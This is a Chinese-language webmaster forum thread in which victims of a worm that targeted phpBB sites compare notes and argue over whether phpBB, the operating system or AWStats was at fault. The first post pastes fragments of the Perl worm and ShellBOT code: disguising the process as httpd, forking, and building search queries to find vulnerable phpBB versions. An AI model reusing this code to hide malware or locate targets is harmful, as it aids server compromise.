[問題] 近日各位的Server是否有遭受worm攻擊

Webmasters Discussion
站長們到此分享架站甘苦、管理心得等;歡迎大家多多提出意見喔!
(請勿發表任何跟站長經驗分享不相干的文章,違者砍文)

版主: 版主管理群

回覆文章
sean70
星球普通子民
星球普通子民
文章: 4
註冊時間: 2002-06-14 10:09
聯繫:

[問題] 近日各位的Server是否有遭受worm攻擊

文章 sean70 »

phpBB 的官方網站已經暫時關閉了 , http://www.phpbb.com
昨日弟的網站也遭受攻擊, 在 tmp 下被放入 31337 , 31338 還有 .hitler 等檔案

31338 內容標頭為
#!/usr/bin/perl
#
# ShellBOT
# 0ldW0lf - old-wolf@zipmail.com
# - http://www.atrix-br.cjb.net
# - http://www.atrix.cjb.net

31337 內容前幾行為\r
# ASW Worm Modification ! by br0k3d@gmail.com ! #
# 4nd Version ! f**k google !


use strict;
use IO::Socket;
use IO::Handle;
\r
#Ripado do b0t.pl ;)

my $processo = '/usr/sbin/httpd';
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

#Fim da ripagem

sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 50;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);

my @str=("powered+-modules++topic+%22by+phpBB+2.0.4%22+",
"view+edit+posts+-modules+-ultimatebb.php+-showthread.php+",
"powered+-modules++topic+%22by+phpBB+2.0.6%22+",
"powered+-modules++topic+%22by+phpBB+2.0.8%22",
"post+-modules+topic+forum%7CphpBB+",
"view+topic+-modules+%22+",
"viewtopic%7CphpBB+-modules+.php+",
"viewtopic+.php+-modules+",
);

因此初步懷疑跟 phpBB 有關..
我已經更新為最新的 2.0.11 了...

有沒有人也有類似經驗呀...
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

phpBB 是因為 OS 沒更新跟 PHPBB 本身沒關係,更新升級到 phpBB 2.0.11 也公告一段時間了!
http://phpbb-tw.net/phpbb/viewtopic.php?t=30698
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
taicomjp
星球公民
星球公民
文章: 32
註冊時間: 2004-08-19 00:00

文章 taicomjp »

OS沒更新\r
這個有關係嗎
不是phpbb裡面源碼漏洞的關係?
依夢兒
竹貓忠實會員
竹貓忠實會員
文章: 2013
註冊時間: 2002-11-20 00:07

文章 依夢兒 »

不是....那是 AWStats 的問題。
有任何關於 phpBB 或是架站的問題,請在論壇上公開發表出來,大家一起討論。
請不要丟私人訊息問我,因為私訊是用來聊私事的。
這樣作對於解決您的問題一點幫助也沒有,也很沒有效率,小弟我一概謝絕。



搜尋是一種美德,在發問之前,請多加利用頂端的文章搜尋功能,搜尋可能的關鍵字。
確定您想問的問題找不到答案後,再發問。
小竹子
竹貓星球大統領
竹貓星球大統領
文章: 4596
註冊時間: 2001-10-29 22:13
來自: 竹貓星球
聯繫:

文章 小竹子 »

taicomjp 寫:OS沒更新\r
這個有關係嗎
不是phpbb裡面源碼漏洞的關係?
你既然願意到官方看被攻擊的公告,那何不了解一下公告內容有提到,目前 2011 還沒有最新的安全漏洞問題字句?

竹貓也公告了不是 phpBB 問題,是的話官方會有解釋,我們也會同步釋出更新版。
注意事項:
●phpBB 架設相關問題請到 + phpBB 3.0.x 討論區發表!
●都沒有你要的答案嗎??>>點這裡<<搜尋一下吧!
●請使用>>標準的發文格式<<發表問題!
●竹貓星球並非政治團體代言人,請不要在竹貓討論政治議題,也不要認為竹貓是偏向任何一方政治團體,竹貓愛的是台灣這片生長的土地,過於泛政治化文章請來信告知移除!
●關於 phpBB 使用問題請在版面發問,私人訊息提供其他不相干或是隱私的事情聯絡之用。
●所有市面上的免費空間皆非竹貓管轄,請勿來信詢問,請直接與該免費空間連絡。
qboywang
星球普通子民
星球普通子民
文章: 1
註冊時間: 2005-02-16 08:40

文章 qboywang »

我跟你一樣多了那些檔~電腦會持續對google或其它站作80 port連線,且有個tcp port會一直增加對外部的不知明主機6667port連線!
回覆文章

回到「站長交流」